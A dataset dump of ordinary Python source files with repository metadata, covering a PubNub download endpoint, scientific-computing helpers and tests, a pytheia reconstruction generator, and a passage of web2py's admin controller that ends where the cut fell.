Dataset schema (one row per source file; ⌀ marks nullable columns):

| column | dtype | range / values |
|---|---|---|
| hexsha | string | length 40 |
| size | int64 | 1 to 1.03M |
| ext | string | 10 classes |
| lang | string | 1 value |
| max_stars_repo_path | string | length 3 to 239 |
| max_stars_repo_name | string | length 5 to 130 |
| max_stars_repo_head_hexsha | string | length 40 to 78 |
| max_stars_repo_licenses | list | length 1 to 10 |
| max_stars_count | int64 ⌀ | 1 to 191k |
| max_stars_repo_stars_event_min_datetime | string ⌀ | length 24 |
| max_stars_repo_stars_event_max_datetime | string ⌀ | length 24 |
| max_issues_repo_path | string | length 3 to 239 |
| max_issues_repo_name | string | length 5 to 130 |
| max_issues_repo_head_hexsha | string | length 40 to 78 |
| max_issues_repo_licenses | list | length 1 to 10 |
| max_issues_count | int64 ⌀ | 1 to 67k |
| max_issues_repo_issues_event_min_datetime | string ⌀ | length 24 |
| max_issues_repo_issues_event_max_datetime | string ⌀ | length 24 |
| max_forks_repo_path | string | length 3 to 239 |
| max_forks_repo_name | string | length 5 to 130 |
| max_forks_repo_head_hexsha | string | length 40 to 78 |
| max_forks_repo_licenses | list | length 1 to 10 |
| max_forks_count | int64 ⌀ | 1 to 105k |
| max_forks_repo_forks_event_min_datetime | string ⌀ | length 24 |
| max_forks_repo_forks_event_max_datetime | string ⌀ | length 24 |
| content | string | length 1 to 1.03M |
| avg_line_length | float64 | 1 to 958k |
| max_line_length | int64 | 1 to 1.03M |
| alphanum_fraction | float64 | 0 to 1 |

In every record below, the repo path, name, head_hexsha, and licenses values are identical across the max_stars, max_issues, and max_forks column groups, so each record shows them once.
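This schema matches The Stack-style code exports on the Hugging Face Hub. As a minimal sketch of how such a dump is typically consumed with the `datasets` library (the dataset id and data_dir are assumptions, not taken from this export):

# Hypothetical loading sketch for a dataset with the schema above.
# "bigcode/the-stack" and data_dir="data/python" are assumed placeholders;
# substitute the actual export this dump came from.
from datasets import load_dataset

ds = load_dataset("bigcode/the-stack", data_dir="data/python",
                  split="train", streaming=True)

for row in ds.take(3):
    # every row pairs repo metadata with the raw source file in `content`
    print(row["hexsha"], row["max_stars_repo_name"], row["size"])
    print(row["content"][:200])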
---
hexsha: 4a142bf75bc571805522d549393df6f64c2e7204 | size: 930 | ext: py | lang: Python
repo: zarif007/Block-Chain-Web-App @ 40bd4d8d8ce1f6de2840792290bf022d7dfacbb4 | licenses: ["MIT"]
path: blockchain-env/Lib/site-packages/pubnub/endpoints/file_operations/download_file_asyncio.py
stars: 1 (2020-12-30T09:30:23.000Z) | issues: null | forks: null

content:
from pubnub.models.consumer.file import PNDownloadFileResult
from pubnub.endpoints.file_operations.download_file import DownloadFileNative
from pubnub.endpoints.file_operations.get_file_url import GetFileDownloadUrl


class DownloadFileAsyncio(DownloadFileNative):
    def create_response(self, envelope, data=None):
        if self._cipher_key or self._pubnub.config.cipher_key:
            data = self.decrypt_payload(data)
        return PNDownloadFileResult(data)

    def future(self):
        self._download_data = yield from GetFileDownloadUrl(self._pubnub)\
            .channel(self._channel)\
            .file_name(self._file_name)\
            .file_id(self._file_id)\
            .future()
        downloaded_file = yield from super(DownloadFileAsyncio, self).future()
        return downloaded_file

    def result(self):
        response_envelope = yield from self.future()
        return response_envelope.result
avg_line_length: 37.2 | max_line_length: 78 | alphanum_fraction: 0.721505
---
hexsha: 4a142c3693d1dbdc3f6cd84d39e3af568bf79552 | size: 163 | ext: py | lang: Python
repo: vemel/nextversion @ e09d78ca62b720004d7cf489288ac88e17cbb0cc | licenses: ["MIT"]
path: __tests__/fixtures/mysetup.py
stars: 2 (2021-03-22T17:48:22.000Z to 2021-03-23T10:46:48.000Z) | issues: 2 (2021-03-24T23:35:55.000Z to 2022-01-02T17:22:40.000Z) | forks: 1 (2021-07-26T20:52:08.000Z)

content:
from setuptools import setup

if __name__ == '__main__':
    setup(
        name='mypackage',
        version='2.3.4a5',
        description='My description'
    )
avg_line_length: 20.375 | max_line_length: 36 | alphanum_fraction: 0.595092
---
hexsha: 4a142d9b59dd08279a5e3af3dddd287df434f5f7 | size: 594 | ext: py | lang: Python
repo: uibcdf/MolModMTs @ 4f6b6f671a9fa3e73008d1e9c48686d5f20a6573 | licenses: ["MIT"]
path: molsysmt/item/nglview_NGLWidget/to_string_aminoacids3.py
stars: null | issues: null | forks: null

content:
from molsysmt._private.exceptions import *
from molsysmt._private.digestion import *


def to_string_aminoacids3(item, atom_indices='all', check=True):

    if check:
        digest_item(item, 'nglview.NGLWidget')
        atom_indices = digest_atom_indices(atom_indices)

    from . import to_molsysmt_Topology
    from ..molsysmt_Topology import to_string_aminoacids3 as molsysmt_Topology_to_string_aminoacids3

    tmp_item = to_molsysmt_Topology(item, atom_indices=atom_indices, check=False)
    tmp_item = molsysmt_Topology_to_string_aminoacids3(tmp_item, check=False)

    return tmp_item
avg_line_length: 31.263158 | max_line_length: 100 | alphanum_fraction: 0.786195
---
hexsha: 4a142e07503c47bc1e5332b062162dc9453b4c78 | size: 3,948 | ext: py | lang: Python
repo: infer-actively/pymdp @ 4775054b0db53ec3f10b0b95eb6e78cc52f3588f | licenses: ["MIT"]
path: test/test_inference.py
stars: 108 (2020-12-08T06:45:28.000Z to 2022-03-30T12:32:59.000Z) | issues: 16 (2021-01-17T14:32:17.000Z to 2022-03-13T16:39:00.000Z) | forks: 17 (2021-01-01T15:02:47.000Z to 2022-03-19T05:08:45.000Z)

content:
#!/usr/bin/env python
# -*- coding: utf-8 -*-

""" Unit Tests
__author__: Conor Heins, Alexander Tschantz, Daphne Demekas, Brennan Klein
"""

import os
import unittest

import numpy as np

from pymdp import utils, maths
from pymdp import inference


class TestInference(unittest.TestCase):

    def test_update_posterior_states(self):
        """
        Tests the refactored version of `update_posterior_states`
        """

        '''Test with single hidden state factor and single observation modality'''

        num_states = [3]
        num_obs = [3]

        prior = utils.random_single_categorical(num_states)
        A = utils.to_arr_of_arr(maths.softmax(np.eye(num_states[0]) * 0.1))

        obs_idx = 1
        obs = utils.onehot(obs_idx, num_obs[0])

        qs_out = inference.update_posterior_states(A, obs, prior=prior)
        qs_validation = maths.softmax(maths.spm_log_single(A[0][obs_idx, :]) + maths.spm_log_single(prior[0]))

        self.assertTrue(np.isclose(qs_validation, qs_out[0]).all())

        '''Try single modality inference where the observation is passed in as an int'''

        qs_out_2 = inference.update_posterior_states(A, obs_idx, prior=prior)
        self.assertTrue(np.isclose(qs_out_2[0], qs_out[0]).all())

        '''Try single modality inference where the observation is a one-hot stored in an object array'''

        qs_out_3 = inference.update_posterior_states(A, utils.to_arr_of_arr(obs), prior=prior)
        self.assertTrue(np.isclose(qs_out_3[0], qs_out[0]).all())

        '''Test with multiple hidden state factors and single observation modality'''

        num_states = [3, 4]
        num_obs = [3]

        prior = utils.random_single_categorical(num_states)
        A = utils.random_A_matrix(num_obs, num_states)

        obs_idx = 1
        obs = utils.onehot(obs_idx, num_obs[0])

        qs_out = inference.update_posterior_states(A, obs, prior=prior, num_iter=1)

        # validate with a quick n' dirty implementation of FPI
        # initialize posterior and log prior
        qs_valid_init = utils.obj_array_uniform(num_states)
        log_prior = maths.spm_log_obj_array(prior)

        qs_valid_final = utils.obj_array(len(num_states))

        log_likelihood = maths.spm_log_single(maths.get_joint_likelihood(A, obs, num_states))

        num_factors = len(num_states)

        qs_valid_init_all = qs_valid_init[0]
        for factor in range(num_factors - 1):
            qs_valid_init_all = qs_valid_init_all[..., None] * qs_valid_init[factor + 1]
        LL_tensor = log_likelihood * qs_valid_init_all

        factor_ids = range(num_factors)

        for factor, qs_f in enumerate(qs_valid_init):
            ax2sum = tuple(set(factor_ids) - set([factor]))  # which axes to sum out
            qL = LL_tensor.sum(axis=ax2sum) / qs_f
            qs_valid_final[factor] = maths.softmax(qL + log_prior[factor])

        for factor, qs_f_valid in enumerate(qs_valid_final):
            self.assertTrue(np.isclose(qs_f_valid, qs_out[factor]).all())

        '''Test with multiple hidden state factors and multiple observation modalities, for two different kinds of observation input formats'''

        num_states = [3, 4]
        num_obs = [3, 3, 5]

        prior = utils.random_single_categorical(num_states)
        A = utils.random_A_matrix(num_obs, num_states)

        obs_index_tuple = tuple([np.random.randint(obs_dim) for obs_dim in num_obs])

        qs_out1 = inference.update_posterior_states(A, obs_index_tuple, prior=prior)

        obs_onehots = utils.obj_array(len(num_obs))
        for g in range(len(num_obs)):
            obs_onehots[g] = utils.onehot(obs_index_tuple[g], num_obs[g])

        qs_out2 = inference.update_posterior_states(A, obs_onehots, prior=prior)

        for factor in range(len(num_states)):
            self.assertTrue(np.isclose(qs_out1[factor], qs_out2[factor]).all())


if __name__ == "__main__":
    unittest.main()
avg_line_length: 34.631579 | max_line_length: 143 | alphanum_fraction: 0.670466
---
hexsha: 4a142e3aa7d6455631311f4fe21b7d271d711368 | size: 5,819 | ext: py | lang: Python
repo: Sergej91/TheiaSfM @ e603e16888456c3e565a2c197fa9f8643c176175 | licenses: ["BSD-3-Clause"]
path: pytest/random_recon_gen.py
stars: null | issues: null | forks: null

content:
import pytheia as pt
from scipy.spatial.transform import Rotation as R
import numpy as np


class RandomReconGenerator:
    def __init__(self, seed=42, verbose=False):
        self.seed = seed
        np.random.seed(self.seed)
        self.recon = pt.sfm.Reconstruction()
        self.nr_views = 0
        self.camera = pt.sfm.Camera()
        self.camera.FocalLength = 500
        self.camera.SetPrincipalPoint(500, 500)
        self.camera.SetImageSize(1000, 1000)
        self.verbose = verbose

    def _sample_views(self, nr_views,
                      xyz_min=[0, 0, 0], xyz_max=[2, 2, 2],
                      rot_ax_min=[-0.1, -0.1, -0.1],
                      rot_ax_max=[0.1, 0.1, 0.1], max_rot_angle=np.pi / 4):
        if self.verbose:
            print("Sampling {} views".format(nr_views))
        self.nr_cams = nr_views
        X = np.random.uniform(low=xyz_min[0], high=xyz_max[0], size=(nr_views,))
        Y = np.random.uniform(low=xyz_min[1], high=xyz_max[1], size=(nr_views,))
        Z = np.random.uniform(low=xyz_min[2], high=xyz_max[2], size=(nr_views,))
        RX = np.random.uniform(low=rot_ax_min[0], high=rot_ax_max[0], size=(nr_views,))
        RY = np.random.uniform(low=rot_ax_min[1], high=rot_ax_max[1], size=(nr_views,))
        RZ = np.random.uniform(low=rot_ax_min[2], high=rot_ax_max[2], size=(nr_views,))
        angles = np.random.uniform(low=-max_rot_angle, high=max_rot_angle, size=(nr_views,))
        for i in range(self.nr_cams):
            view_id = self.recon.AddView(str(i), 0, i)
            view = self.recon.View(view_id)
            m_cam = view.MutableCamera()
            m_cam.DeepCopy(self.camera)
            m_cam.Position = np.array([X[i], Y[i], Z[i]])
            m_cam.SetOrientationFromAngleAxis(angles[i] * np.array([RX[i], RY[i], RZ[i]]))
            view.IsEstimated = True

    def _sample_tracks(self, nr_tracks, xyz_min=[-2, -2, -2], xyz_max=[2, 2, 2]):
        if self.verbose:
            print("Sampling {} tracks".format(nr_tracks))
        self.nr_tracks = nr_tracks
        X = np.random.uniform(low=xyz_min[0], high=xyz_max[0], size=(nr_tracks,))
        Y = np.random.uniform(low=xyz_min[1], high=xyz_max[1], size=(nr_tracks,))
        Z = np.random.uniform(low=xyz_min[2], high=xyz_max[2], size=(nr_tracks,))
        for i in range(self.nr_tracks):
            track_id = self.recon.AddTrack()
            point = np.array([X[i], Y[i], Z[i], 1], dtype=np.float32)
            track = self.recon.MutableTrack(track_id)
            track.Point = point
            track.IsEstimated = True

    # def _project_points_to_views(self):

    def generate_random_recon(self,
                              nr_views=10,
                              nr_tracks=100,
                              pt3_xyz_min=[-4, -4, -1],
                              pt3_xyz_max=[4, 4, 6],
                              cam_xyz_min=[-6, -6, -2],
                              cam_xyz_max=[6, 6, -6],
                              cam_rot_ax_min=[-0.1, -0.1, -0.1],
                              cam_rot_ax_max=[0.1, 0.1, 0.1],
                              cam_rot_max_angle=np.pi / 4,
                              pixel_noise=0.0):
        self._sample_tracks(nr_tracks, pt3_xyz_min, pt3_xyz_max)
        self._sample_views(nr_views, cam_xyz_min, cam_xyz_max,
                           cam_rot_ax_min, cam_rot_ax_max, cam_rot_max_angle)
        self._create_observations(pixel_noise=pixel_noise)
        return self.recon

    def _create_observations(self, pixel_noise=0.0):
        for tid in self.recon.TrackIds:
            track = self.recon.Track(tid).Point
            for vid in self.recon.ViewIds:
                view = self.recon.View(vid)
                cam = view.Camera()
                obs = cam.ProjectPoint(track)
                if obs[0] <= 0:
                    continue
                point2d = obs[1] + np.random.randn(2) * pixel_noise
                if self.verbose:
                    print("Adding observation: track {} in view {} projection {}".format(tid, vid, point2d))
                self.recon.AddObservation(vid, tid, pt.sfm.Feature(point2d))

    def add_view(self, view_pos, view_ax_angle, view_name=""):
        num_views = len(self.recon.ViewIds)
        view_id = self.recon.AddView(view_name, 0, num_views + 1)
        if self.verbose:
            print("Adding view {}".format(view_id))
        view = self.recon.View(view_id)
        view.MutableCamera().Position = np.array(view_pos)
        view.MutableCamera().SetOrientationFromAngleAxis(view_ax_angle)
        view.IsEstimated = True

    def add_track(self, track_xyz):
        track_id = self.recon.AddTrack()
        if self.verbose:
            print("Adding track {}".format(track_id))
        track = self.recon.MutableTrack(track_id)
        track.Point = np.array([track_xyz[0], track_xyz[1], track_xyz[2], 1], dtype=np.float32)
        track.IsEstimated = True

    def add_noise_to_view(self, view_id, noise_pos, noise_angle):
        view = self.recon.View(view_id)
        view.MutableCamera().Position = view.MutableCamera().Position + noise_pos * np.random.randn(3)
        ax_angle = view.Camera().GetOrientationAsAngleAxis()
        noise_angle_rad = noise_angle * np.pi / 180.
        view.MutableCamera().SetOrientationFromAngleAxis(ax_angle + noise_angle_rad * np.random.randn(3))

    def add_noise_to_views(self, noise_pos=1e-5, noise_angle=1e-2):
        for view_id in self.recon.ViewIds:
            self.add_noise_to_view(view_id, noise_pos, noise_angle)


if __name__ == "__main__":
    gen = RandomReconGenerator(seed=42, verbose=True)
    gen.generate_random_recon()
    for i in range(10):
        gen.add_track([i * i, i, i + i])
    for i in range(10):
        gen.add_view(view_pos=[0, i, 0], view_ax_angle=[i, 0, 0], view_name="ii" + str(i))
avg_line_length: 42.166667 | max_line_length: 108 | alphanum_fraction: 0.585668
---
hexsha: 4a142f2249f00547f3d9628abf93c9eac1a0dcf8 | size: 74,928 | ext: py | lang: Python
repo: jessicadelrio/HandyHouse @ 058e8981da850790c84f990fd2a3bbcf9aa695cc | licenses: ["BSD-3-Clause"]
path: applications/admin/controllers/default.py
stars: 2 (2018-12-08T23:59:12.000Z to 2019-02-13T23:04:36.000Z) | issues: null | forks: 3 (2018-12-08T23:59:17.000Z to 2019-02-13T23:04:38.000Z)

content:
# -*- coding: utf-8 -*-

EXPERIMENTAL_STUFF = True
MAXNFILES = 1000

if EXPERIMENTAL_STUFF:
    if is_mobile:
        response.view = response.view.replace('default/', 'default.mobile/')
        response.menu = []

import re
from gluon.admin import *
from gluon.fileutils import abspath, read_file, write_file
from gluon.utils import web2py_uuid
from gluon.tools import Config
from gluon.compileapp import find_exposed_functions
from glob import glob
from gluon._compat import iteritems, PY2, pickle, xrange, urlopen, to_bytes, StringIO, to_native
import gluon.rewrite
import shutil
import platform

try:
    import git
    if git.__version__ < '0.3.1':
        raise ImportError("Your version of git is %s. Upgrade to 0.3.1 or better." % git.__version__)
    have_git = True
except ImportError as e:
    have_git = False
    GIT_MISSING = 'Requires gitpython module, but not installed or incompatible version: %s' % e

from gluon.languages import (read_possible_languages, read_dict, write_dict,
                             read_plural_dict, write_plural_dict)

if DEMO_MODE and request.function in ['change_password', 'pack',
                                      'pack_custom', 'pack_plugin', 'upgrade_web2py', 'uninstall',
                                      'cleanup', 'compile_app', 'remove_compiled_app', 'delete',
                                      'delete_plugin', 'create_file', 'upload_file', 'update_languages',
                                      'reload_routes', 'git_push', 'git_pull', 'install_plugin']:
    session.flash = T('disabled in demo mode')
    redirect(URL('site'))

if is_gae and request.function in ('edit', 'edit_language',
                                   'edit_plurals', 'update_languages', 'create_file', 'install_plugin'):
    session.flash = T('disabled in GAE mode')
    redirect(URL('site'))

if not is_manager() and request.function in ['change_password', 'upgrade_web2py']:
    session.flash = T('disabled in multi user mode')
    redirect(URL('site'))

if FILTER_APPS and request.args(0) and not request.args(0) in FILTER_APPS:
    session.flash = T('disabled in demo mode')
    redirect(URL('site'))

if not session.token:
    session.token = web2py_uuid()

def count_lines(data):
    return len([line for line in data.split('\n') if line.strip() and not line.startswith('#')])

def log_progress(app, mode='EDIT', filename=None, progress=0):
    progress_file = os.path.join(apath(app, r=request), 'progress.log')
    now = str(request.now)[:19]
    if not os.path.exists(progress_file):
        safe_open(progress_file, 'w').write('[%s] START\n' % now)
    if filename:
        safe_open(progress_file, 'a').write(
            '[%s] %s %s: %s\n' % (now, mode, filename, progress))

def safe_open(a, b):
    if (DEMO_MODE or is_gae) and ('w' in b or 'a' in b):
        class tmp:
            def write(self, data):
                pass

            def close(self):
                pass

        return tmp()
    if PY2 or 'b' in b:
        return open(a, b)
    else:
        return open(a, b, encoding="utf8")

def safe_read(a, b='r'):
    safe_file = safe_open(a, b)
    try:
        return safe_file.read()
    finally:
        safe_file.close()

def safe_write(a, value, b='w'):
    safe_file = safe_open(a, b)
    try:
        safe_file.write(value)
    finally:
        safe_file.close()

def get_app(name=None):
    app = name or request.args(0)
    if (app and os.path.exists(apath(app, r=request)) and
            (not MULTI_USER_MODE or is_manager() or
             db(db.app.name == app)(db.app.owner == auth.user.id).count())):
        return app
    session.flash = T('App does not exist or you are not authorized')
    redirect(URL('site'))

def index():
    """ Index handler """
    send = request.vars.send
    if DEMO_MODE:
        session.authorized = True
        session.last_time = t0
    if not send:
        send = URL('site')
    if session.authorized:
        redirect(send)
    elif failed_login_count() >= allowed_number_of_attempts:
        time.sleep(2 ** allowed_number_of_attempts)
        raise HTTP(403)
    elif request.vars.password:
        if verify_password(request.vars.password[:1024]):
            session.authorized = True
            login_record(True)
            if CHECK_VERSION:
                session.check_version = True
            else:
                session.check_version = False
            session.last_time = t0
            if isinstance(send, list):  # ## why does this happen?
                send = str(send[0])
            redirect(send)
        else:
            times_denied = login_record(False)
            if times_denied >= allowed_number_of_attempts:
                response.flash = \
                    T('admin disabled because too many invalid login attempts')
            elif times_denied == allowed_number_of_attempts - 1:
                response.flash = \
                    T('You have one more login attempt before you are locked out')
            else:
                response.flash = T('invalid password.')
    return dict(send=send)

def check_version():
    """ Checks if web2py is up to date """
    session.forget()
    session._unlock(response)
    new_version, version = check_new_version(request.env.web2py_version,
                                             WEB2PY_VERSION_URL)
    if new_version == -1:
        return A(T('Unable to check for upgrades'), _href=WEB2PY_URL)
    elif new_version != True:
        return A(T('web2py is up to date'), _href=WEB2PY_URL)
    elif platform.system().lower() in ('windows', 'win32', 'win64') and os.path.exists("web2py.exe"):
        return SPAN('You should upgrade to %s' % version.split('(')[0])
    else:
        return sp_button(URL('upgrade_web2py'), T('upgrade now to %s') % version.split('(')[0])

def logout():
    """ Logout handler """
    session.authorized = None
    if MULTI_USER_MODE:
        redirect(URL('user/logout'))
    redirect(URL('index'))

def change_password():
    if session.pam_user:
        session.flash = T(
            'PAM authenticated user, cannot change password here')
        redirect(URL('site'))
    form = SQLFORM.factory(Field('current_admin_password', 'password'),
                           Field('new_admin_password',
                                 'password', requires=IS_STRONG()),
                           Field('new_admin_password_again', 'password'),
                           _class="span4 well")
    if form.accepts(request.vars):
        if not verify_password(request.vars.current_admin_password):
            form.errors.current_admin_password = T('invalid password')
        elif form.vars.new_admin_password != form.vars.new_admin_password_again:
            form.errors.new_admin_password_again = T('no match')
        else:
            path = abspath('parameters_%s.py' % request.env.server_port)
            safe_write(path, 'password="%s"' % CRYPT()(
                request.vars.new_admin_password)[0])
            session.flash = T('password changed')
            redirect(URL('site'))
    return dict(form=form)

def site():
    """ Site handler """
    myversion = request.env.web2py_version
    # Shortcut to make the elif statements more legible
    file_or_appurl = 'file' in request.vars or 'appurl' in request.vars

    class IS_VALID_APPNAME(object):
        def __call__(self, value):
            if not re.compile('^\w+$').match(value):
                return (value, T('Invalid application name'))
            if not request.vars.overwrite and \
                    os.path.exists(os.path.join(apath(r=request), value)):
                return (value, T('Application exists already'))
            return (value, None)

    is_appname = IS_VALID_APPNAME()
    form_create = SQLFORM.factory(Field('name', requires=is_appname),
                                  table_name='appcreate')
    form_update = SQLFORM.factory(Field('name', requires=is_appname),
                                  Field('file', 'upload', uploadfield=False),
                                  Field('url'),
                                  Field('overwrite', 'boolean'),
                                  table_name='appupdate')
    form_create.process()
    form_update.process()

    if DEMO_MODE:
        pass
    elif form_create.accepted:
        # create a new application
        appname = cleanpath(form_create.vars.name)
        created, error = app_create(appname, request, info=True)
        if created:
            if MULTI_USER_MODE:
                db.app.insert(name=appname, owner=auth.user.id)
            log_progress(appname)
            session.flash = T('new application "%s" created', appname)
            gluon.rewrite.load()
            redirect(URL('design', args=appname))
        else:
            session.flash = \
                DIV(T('unable to create application "%s"', appname),
                    PRE(error))
        redirect(URL(r=request))
    elif form_update.accepted:
        if (form_update.vars.url or '').endswith('.git'):
            if not have_git:
                session.flash = GIT_MISSING
                redirect(URL(r=request))
            target = os.path.join(apath(r=request), form_update.vars.name)
            try:
                new_repo = git.Repo.clone_from(form_update.vars.url, target)
                session.flash = T('new application "%s" imported',
                                  form_update.vars.name)
                gluon.rewrite.load()
            except git.GitCommandError as err:
                session.flash = T('Invalid git repository specified.')
            redirect(URL(r=request))
        elif form_update.vars.url:
            # fetch an application via URL or file upload
            try:
                f = urlopen(form_update.vars.url)
                if f.code == 404:
                    raise Exception("404 file not found")
            except Exception as e:
                session.flash = \
                    DIV(T('Unable to download app because:'), PRE(repr(e)))
                redirect(URL(r=request))
            fname = form_update.vars.url
        elif form_update.accepted and form_update.vars.file:
            fname = request.vars.file.filename
            f = request.vars.file.file
        else:
            session.flash = 'No file uploaded and no URL specified'
            redirect(URL(r=request))
        if f:
            appname = cleanpath(form_update.vars.name)
            installed = app_install(appname, f,
                                    request, fname,
                                    overwrite=form_update.vars.overwrite)
        if f and installed:
            msg = 'application %(appname)s installed with md5sum: %(digest)s'
            if MULTI_USER_MODE:
                db.app.insert(name=appname, owner=auth.user.id)
            log_progress(appname)
            session.flash = T(msg, dict(appname=appname,
                                        digest=md5_hash(installed)))
            gluon.rewrite.load()
        else:
            msg = 'unable to install application "%(appname)s"'
            session.flash = T(msg, dict(appname=form_update.vars.name))
        redirect(URL(r=request))

    regex = re.compile('^\w+$')
    if is_manager():
        apps = [a for a in os.listdir(apath(r=request)) if regex.match(a) and
                a != '__pycache__']
    else:
        apps = [a.name for a in db(db.app.owner == auth.user_id).select()]
    if FILTER_APPS:
        apps = [a for a in apps if a in FILTER_APPS]
    apps = sorted(apps, key=lambda a: a.upper())
    myplatform = platform.python_version()
    return dict(app=None, apps=apps, myversion=myversion, myplatform=myplatform,
                form_create=form_create, form_update=form_update)

def report_progress(app):
    import datetime
    progress_file = os.path.join(apath(app, r=request), 'progress.log')
    regex = re.compile('\[(.*?)\][^\:]+\:\s+(\-?\d+)')
    if not os.path.exists(progress_file):
        return []
    matches = regex.findall(open(progress_file, 'r').read())
    events, counter = [], 0
    for m in matches:
        if not m:
            continue
        days = -(request.now - datetime.datetime.strptime(m[0],
                                                          '%Y-%m-%d %H:%M:%S')).days
        counter += int(m[1])
        events.append([days, counter])
    return events

def pack():
    app = get_app()
    try:
        if len(request.args) == 1:
            fname = 'web2py.app.%s.w2p' % app
            filename = app_pack(app, request, raise_ex=True)
        else:
            fname = 'web2py.app.%s.compiled.w2p' % app
            filename = app_pack_compiled(app, request, raise_ex=True)
    except Exception as e:
        filename = None
    if filename:
        response.headers['Content-Type'] = 'application/w2p'
        disposition = 'attachment; filename=%s' % fname
        response.headers['Content-Disposition'] = disposition
        return safe_read(filename, 'rb')
    else:
        session.flash = T('internal error: %s', e)
        redirect(URL('site'))

def pack_plugin():
    app = get_app()
    if len(request.args) == 2:
        fname = 'web2py.plugin.%s.w2p' % request.args[1]
        filename = plugin_pack(app, request.args[1], request)
    if filename:
        response.headers['Content-Type'] = 'application/w2p'
        disposition = 'attachment; filename=%s' % fname
        response.headers['Content-Disposition'] = disposition
        return safe_read(filename, 'rb')
    else:
        session.flash = T('internal error')
        redirect(URL('plugin', args=request.args))

def pack_exe(app, base, filenames=None):
    import urllib
    import zipfile
    # Download latest web2py_win and open it with zipfile
    download_url = 'http://www.web2py.com/examples/static/web2py_win.zip'
    out = StringIO()
    out.write(urlopen(download_url).read())
    web2py_win = zipfile.ZipFile(out, mode='a')
    # Write routes.py with the application as default
    routes = u'# -*- coding: utf-8 -*-\nrouters = dict(BASE=dict(default_application="%s"))' % app
    web2py_win.writestr('web2py/routes.py', routes.encode('utf-8'))
    # Copy the application into the zipfile
    common_root = os.path.dirname(base)
    for filename in filenames:
        fname = os.path.join(base, filename)
        arcname = os.path.join('web2py/applications', app, filename)
        web2py_win.write(fname, arcname)
    web2py_win.close()
    response.headers['Content-Type'] = 'application/zip'
    response.headers['Content-Disposition'] = 'attachment; filename=web2py.app.%s.zip' % app
    out.seek(0)
    return response.stream(out)

def pack_custom():
    app = get_app()
    base = apath(app, r=request)

    def ignore(fs):
        return [f for f in fs if not (
            f[:1] in '#' or f.endswith('~') or f.endswith('.bak'))]

    files = {}
    for (r, d, f) in os.walk(base):
        files[r] = {'folders': ignore(d), 'files': ignore(f)}
    if request.post_vars.file:
        valid_set = set(os.path.relpath(os.path.join(r, f), base) for r in files for f in files[r]['files'])
        files = request.post_vars.file
        files = [files] if not isinstance(files, list) else files
        files = [file for file in files if file in valid_set]
        if request.post_vars.doexe is None:
            fname = 'web2py.app.%s.w2p' % app
            try:
                filename = app_pack(app, request, raise_ex=True, filenames=files)
            except Exception as e:
                filename = None
            if filename:
                response.headers['Content-Type'] = 'application/w2p'
                disposition = 'attachment; filename=%s' % fname
                response.headers['Content-Disposition'] = disposition
                return safe_read(filename, 'rb')
            else:
                session.flash = T('internal error: %s', e)
                redirect(URL(args=request.args))
        else:
            return pack_exe(app, base, files)
    return locals()

def upgrade_web2py():
    dialog = FORM.confirm(T('Upgrade'),
                          {T('Cancel'): URL('site')})
    if dialog.accepted:
        (success, error) = upgrade(request)
        if success:
            session.flash = T('web2py upgraded; please restart it')
        else:
            session.flash = T('unable to upgrade because "%s"', error)
        redirect(URL('site'))
    return dict(dialog=dialog)

def uninstall():
    app = get_app()
    dialog = FORM.confirm(T('Uninstall'),
                          {T('Cancel'): URL('site')})
    dialog['_id'] = 'confirm_form'
    dialog['_class'] = 'well'
    for component in dialog.components:
        component['_class'] = 'btn'
    if dialog.accepted:
        if MULTI_USER_MODE:
            if is_manager() and db(db.app.name == app).delete():
                pass
            elif db(db.app.name == app)(db.app.owner == auth.user.id).delete():
                pass
            else:
                session.flash = T('no permission to uninstall "%s"', app)
                redirect(URL('site'))
        try:
            filename = app_pack(app, request, raise_ex=True)
        except:
            session.flash = T('unable to uninstall "%s"', app)
        else:
            if app_uninstall(app, request):
                session.flash = T('application "%s" uninstalled', app)
            else:
                session.flash = T('unable to uninstall "%s"', app)
        redirect(URL('site'))
    return dict(app=app, dialog=dialog)

def cleanup():
    app = get_app()
    clean = app_cleanup(app, request)
    if not clean:
        session.flash = T("some files could not be removed")
    else:
        session.flash = T('cache, errors and sessions cleaned')
    redirect(URL('site'))

def compile_app():
    app = get_app()
    c = app_compile(app, request,
                    skip_failed_views=(request.args(1) == 'skip_failed_views'))
    if not c:
        session.flash = T('application compiled')
    elif isinstance(c, list):
        session.flash = DIV(*[T('application compiled'), BR(), BR(),
                              T('WARNING: The following views could not be compiled:'), BR()] +
                            [CAT(BR(), view) for view in c] +
                            [BR(), BR(), T('DO NOT use the "Pack compiled" feature.')])
    else:
        session.flash = DIV(T('Cannot compile: there are errors in your app:'),
                            CODE(c))
    redirect(URL('site'))

def remove_compiled_app():
    """ Remove the compiled application """
    app = get_app()
    remove_compiled_application(apath(app, r=request))
    session.flash = T('compiled application removed')
    redirect(URL('site'))

def delete():
    """ Object delete handler """
    app = get_app()
    filename = '/'.join(request.args)
    sender = request.vars.sender
    if isinstance(sender, list):  # ## fix a problem with Vista
        sender = sender[0]
    dialog = FORM.confirm(T('Delete'),
                          {T('Cancel'): URL(sender, anchor=request.vars.id)})
    if dialog.accepted:
        try:
            full_path = apath(filename, r=request)
            lineno = count_lines(open(full_path, 'r').read())
            os.unlink(full_path)
            log_progress(app, 'DELETE', filename, progress=-lineno)
            session.flash = T('file "%(filename)s" deleted',
                              dict(filename=filename))
        except Exception:
            session.flash = T('unable to delete file "%(filename)s"',
                              dict(filename=filename))
        redirect(URL(sender, anchor=request.vars.id2))
    return dict(dialog=dialog, filename=filename)

def enable():
    if not URL.verify(request, hmac_key=session.hmac_key):
        raise HTTP(401)
    app = get_app()
    filename = os.path.join(apath(app, r=request), 'DISABLED')
    if is_gae:
        return SPAN(T('Not supported'), _style='color:yellow')
    elif os.path.exists(filename):
        os.unlink(filename)
        return SPAN(T('Disable'), _style='color:green')
    else:
        if PY2:
            safe_open(filename, 'wb').write('disabled: True\ntime-disabled: %s' % request.now)
        else:
            str_ = 'disabled: True\ntime-disabled: %s' % request.now
            safe_open(filename, 'wb').write(str_.encode('utf-8'))
        return SPAN(T('Enable'), _style='color:red')

def peek():
    """ Visualize object code """
    app = get_app(request.vars.app)
    filename = '/'.join(request.args)
    if request.vars.app:
        path = abspath(filename)
    else:
        path = apath(filename, r=request)
    try:
        data = safe_read(path).replace('\r', '')
    except IOError:
        session.flash = T('file does not exist')
        redirect(URL('site'))
    extension = filename[filename.rfind('.') + 1:].lower()
    return dict(app=app,
                filename=filename,
                data=data,
                extension=extension)

def test():
    """ Execute controller tests """
    app = get_app()
    if len(request.args) > 1:
        file = request.args[1]
    else:
        file = '.*\.py'
    controllers = listdir(
